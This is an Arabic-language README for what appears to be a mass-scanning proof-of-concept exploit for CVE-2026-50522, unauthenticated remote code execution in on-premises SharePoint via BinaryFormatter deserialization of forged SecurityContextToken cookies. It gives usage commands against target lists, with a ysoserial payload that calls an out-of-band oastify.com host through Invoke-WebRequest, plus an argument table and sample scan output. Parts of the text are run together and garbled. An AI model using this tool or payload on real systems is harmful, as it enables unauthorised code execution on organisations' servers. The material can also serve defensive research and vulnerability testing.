
إثبات المفهوم لـ CVE-2026-50522
تنفيذ تعليمات برمجية عن بُعد دون مصادقة على خادم SharePoint عبر إلغاء تسلسل ملف تعريف الارتباط SecurityContextToken
أداة استغلال للمسح الجماعي لثغرة CVE-2026-50522 التي تستهدف خادم Microsoft SharePoint المحلي (on-premises). تستغل عملية إلغاء التسلسل غير الآمنة في BinaryFormatter داخل نقطة نهاية WS-Federation في /_trust/default.aspx لتحقيق تنفيذ أوامر دون مصادقة عبر ملفات تعريف ارتباط SecurityContextToken مُصنّعة.
ملاحظة: يتضمن هذا المشروع أداة
ysoserialالمعروفة في اختبار الاختراق، لذا قد يضعها برنامج مكافحة الفيروسات لديك في الحجر الصحي أو يحذّر منها أثناء التنزيل.
ysoserial.exe حمولة مُسلسلة بصيغة BinaryFormatter باستخدام أداة TypeConfuseDelegateInvoke-WebRequest إلى عنوان URL خارج النطاق (out-of-band) للاستدعاء الرجعيSecurityContextTokenRequestSecurityTokenResponse (WS-Federation)wresult عبر POST إلى /_trust/default.aspxrequestspython CVE-2026-50522.py -t http://10.10.10.5 -c http://YOUR_ID.oastify.com
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --ysoserial C:\tools\ysoserial.exe
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com -x http://127.0.0.1:8080
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --callback-mode subdomain
| الوسيط | الوصف | الافتراضي |
|---|---|---|
-t, --target | عنوان URL لهدف واحد | - |
-T, --targets | ملف يحتوي على عناوين URL للأهداف، سطر لكل هدف | - |
-c, --callback-url | عنوان URL الأساسي للاستدعاء الرجعي خارج النطاق (مطلوب) | - |
--callback-mode | path أو subdomain | path |
--ysoserial | المسار إلى ysoserial.exe | ysoserial.exe |
-x, --proxy | وكيل HTTP | لا يوجد |
وضع المسار (Path) (الافتراضي):
http://YOUR_ID.oastify.com/10.10.10.5
وضع النطاق الفرعي (Subdomain):
http://10.10.10.5.YOUR_ID.oastify.com
[*] 50 target(s) | callback: http://abc123.oastify.com (path) | ysoserial: ysoserial.exe
[10.10.10.5] [+] 200 [LOGIN_PAGE,AUTH_COOKIE]
[10.10.10.6] [!] 200 [AMSI_BLOCKED]
[10.10.10.7] [!] TIMEOUT
[10.10.10.8] [!] SSL_ERR
[10.10.10.9] [!] 403 [HTTP_403]
[*] 45.2s | 50 total | 12 potential | 3 amsi | 5 failed